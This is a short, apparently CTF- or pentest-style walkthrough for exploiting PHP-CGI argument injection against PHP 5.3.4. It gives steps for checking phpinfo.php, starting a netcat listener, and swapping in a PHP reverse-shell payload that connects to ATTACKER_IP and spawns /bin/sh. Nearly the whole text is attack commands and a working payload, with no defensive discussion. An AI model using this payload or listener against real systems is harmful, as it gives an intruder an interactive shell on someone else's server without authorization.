CGI Argument Injection

1. Check if phpinfo.php file is available to get the used PHP version.

2. In this case, PHP version is 5.3.4 and CGI Argument Injection exploit can be used.

3. Set up a netcat listener:

nc -nlvp 1234

1. Change the executed command to:

<?php $sock=fsockopen("ATTACKER_IP",1234);exec("/bin/sh -i <&4 >&4 2>&4");?>